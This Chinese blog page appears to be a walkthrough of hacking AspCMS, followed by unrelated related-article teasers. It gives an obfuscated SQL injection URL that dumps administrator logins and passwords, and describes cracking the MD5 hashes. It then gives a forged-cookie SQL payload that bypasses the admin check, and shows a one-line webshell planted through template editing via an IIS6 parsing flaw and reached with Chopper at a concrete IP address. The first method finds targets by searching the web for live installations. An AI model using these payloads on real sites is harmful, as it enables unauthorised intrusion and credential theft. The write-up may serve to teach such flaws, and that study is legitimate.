热门标签 | HotTags
当前位置:  开发笔记 > 编程语言 > 正文

【WEB】aspcms漏洞利用

【社工方法】(不推荐)1.首先谷歌关键字Poweredbyaspcms.comCopyright?2010-2011的漏洞,果然功夫不负
【社工方法】(不推荐)

1.首先谷歌关键字 Powered by aspcms.com Copyright ?2010-2011 的漏洞,果然功夫不负有心人
2.接着利用注入漏洞
/plug/comment/commentList.asp?id=0%20unmasterion%20semasterlect%20top%201%20UserID,GroupID,LoginName,Password,now%28%29,null,1%20%20frmasterom%20{prefix}user


然后登陆https://www.somd5.com/来解md5

3.去登陆后台 ,登陆成功
然后搜了一下aspcms 的文件上传get webshell 
https://www.i0day.com/1595.html
我们来尝试一下
我们点击修改
 

我们点开看一下
 

直接菜刀链接即可

 

这种方法只能算作社工解决问题。

【原理解决】(推荐)

1、简单分析
下载CMS源码并简单分析
inc/AspCms_CommonFun.asp在查看asp代码问题:
image001.png
代码详细分析:  分为三层if语句判断

Function checkLogin()if isnul(rCOOKIE("adminName")) or rCOOKIE("adminName")&#61;"" thenalertMsgAndGo"您还没有登陆","/"    //adminName不能为空elsedim PermissionsPermissions&#61;rCOOKIE("groupMenu")if Permissions<>"all" and isnul(Permissions) thenalertMsgAndGo"您没有访问权限","-1"   //groupMenu需要等于all   if not isnum(rCOOKIE("adminrand")) then alertMsgAndGo"您没有访问权限","-1" end ifsql &#61; "select count(*) from {prefix}User where LoginName &#61; &#39;"&rCOOKIE("adminName") &"&#39; and adminrand&#61;&#39;"&rCOOKIE("adminrand")&"&#39;"Dim rscoo : Set rscoo&#61;Conn.Exec(sql,"r1")if rscoo(0)<>1 thenwCOOKIE"adminName",""     wCOOKIE"adminId",""wCOOKIE"groupMenu",""wCOOKIE"SceneMenu",""alertMsgAndGo"您没有访问权限","-1"    adminrand值需要为一个数字&#xff0c;SQL语句必须成立且返回数字为1时才具有访问权限。end if

构造&#xff1a;
groupMenu&#61;all;
adminrand&#61;1;
adminName&#61;admin&#39; or ‘1’&#61;&#39;1
2、使用COOKIEsmanager进行COOKIE伪造。
image003.png
访问&#xff1a;http://219.153.49.228:42856/admin/
登录后台-点击后台导航
image005.png
3、点击界面风格-编辑模板/CSS文件-编辑
image007.png
查看一个一句话木马存在且利用了IIS6解析漏洞。
image009.png
访问目标文件&#xff1a;
http://219.153.49.228:42856/Templates/green/html/1.asp;.html
4、使用菜刀连接一句话木马&#xff0c;在根目录找到文件
image011.png

 


推荐阅读
  • Webmin远程命令执行漏洞复现及防护方法
    本文介绍了Webmin远程命令执行漏洞CVE-2019-15107的漏洞详情和复现方法,同时提供了防护方法。漏洞存在于Webmin的找回密码页面中,攻击者无需权限即可注入命令并执行任意系统命令。文章还提供了相关参考链接和搭建靶场的步骤。此外,还指出了参考链接中的数据包不准确的问题,并解释了漏洞触发的条件。最后,给出了防护方法以避免受到该漏洞的攻击。 ... [详细]
  • 目录实现效果:实现环境实现方法一:基本思路主要代码JavaScript代码总结方法二主要代码总结方法三基本思路主要代码JavaScriptHTML总结实 ... [详细]
  • 本文介绍了绕过WAF的XSS检测机制的方法,包括确定payload结构、测试和混淆。同时提出了一种构建XSS payload的方法,该payload与安全机制使用的正则表达式不匹配。通过清理用户输入、转义输出、使用文档对象模型(DOM)接收器和源、实施适当的跨域资源共享(CORS)策略和其他安全策略,可以有效阻止XSS漏洞。但是,WAF或自定义过滤器仍然被广泛使用来增加安全性。本文的方法可以绕过这种安全机制,构建与正则表达式不匹配的XSS payload。 ... [详细]
  • GetWindowLong函数
    今天在看一个代码里头写了GetWindowLong(hwnd,0),我当时就有点费解,靠,上网搜索函数原型说明,死活找不到第 ... [详细]
  • 本文介绍了在开发Android新闻App时,搭建本地服务器的步骤。通过使用XAMPP软件,可以一键式搭建起开发环境,包括Apache、MySQL、PHP、PERL。在本地服务器上新建数据库和表,并设置相应的属性。最后,给出了创建new表的SQL语句。这个教程适合初学者参考。 ... [详细]
  • 这是原文链接:sendingformdata许多情况下,我们使用表单发送数据到服务器。服务器处理数据并返回响应给用户。这看起来很简单,但是 ... [详细]
  • 本文主要解析了Open judge C16H问题中涉及到的Magical Balls的快速幂和逆元算法,并给出了问题的解析和解决方法。详细介绍了问题的背景和规则,并给出了相应的算法解析和实现步骤。通过本文的解析,读者可以更好地理解和解决Open judge C16H问题中的Magical Balls部分。 ... [详细]
  • 本文介绍了使用postman进行接口测试的方法,以测试用户管理模块为例。首先需要下载并安装postman,然后创建基本的请求并填写用户名密码进行登录测试。接下来可以进行用户查询和新增的测试。在新增时,可以进行异常测试,包括用户名超长和输入特殊字符的情况。通过测试发现后台没有对参数长度和特殊字符进行检查和过滤。 ... [详细]
  • 使用Ubuntu中的Python获取浏览器历史记录原文: ... [详细]
  • 本文详细介绍了在ASP.NET中获取插入记录的ID的几种方法,包括使用SCOPE_IDENTITY()和IDENT_CURRENT()函数,以及通过ExecuteReader方法执行SQL语句获取ID的步骤。同时,还提供了使用这些方法的示例代码和注意事项。对于需要获取表中最后一个插入操作所产生的ID或马上使用刚插入的新记录ID的开发者来说,本文提供了一些有用的技巧和建议。 ... [详细]
  • 闭包一直是Java社区中争论不断的话题,很多语言都支持闭包这个语言特性,闭包定义了一个依赖于外部环境的自由变量的函数,这个函数能够访问外部环境的变量。本文以JavaScript的一个闭包为例,介绍了闭包的定义和特性。 ... [详细]
  • 背景应用安全领域,各类攻击长久以来都危害着互联网上的应用,在web应用安全风险中,各类注入、跨站等攻击仍然占据着较前的位置。WAF(Web应用防火墙)正是为防御和阻断这类攻击而存在 ... [详细]
  • 本文介绍了在go语言中利用(*interface{})(nil)传递参数类型的原理及应用。通过分析Martini框架中的injector类型的声明,解释了values映射表的作用以及parent Injector的含义。同时,讨论了该技术在实际开发中的应用场景。 ... [详细]
  • GSIOpenSSH PAM_USER 安全绕过漏洞
    漏洞名称:GSI-OpenSSHPAM_USER安全绕过漏洞CNNVD编号:CNNVD-201304-097发布时间:2013-04-09 ... [详细]
  • 本文介绍了PE文件结构中的导出表的解析方法,包括获取区段头表、遍历查找所在的区段等步骤。通过该方法可以准确地解析PE文件中的导出表信息。 ... [详细]
author-avatar
手机用户2602909133
这个家伙很懒,什么也没留下!
PHP1.CN | 中国最专业的PHP中文社区 | DevBox开发工具箱 | json解析格式化 |PHP资讯 | PHP教程 | 数据库技术 | 服务器技术 | 前端开发技术 | PHP框架 | 开发工具 | 在线工具
Copyright © 1998 - 2020 PHP1.CN. All Rights Reserved | 京公网安备 11010802041100号 | 京ICP备19059560号-4 | PHP1.CN 第一PHP社区 版权所有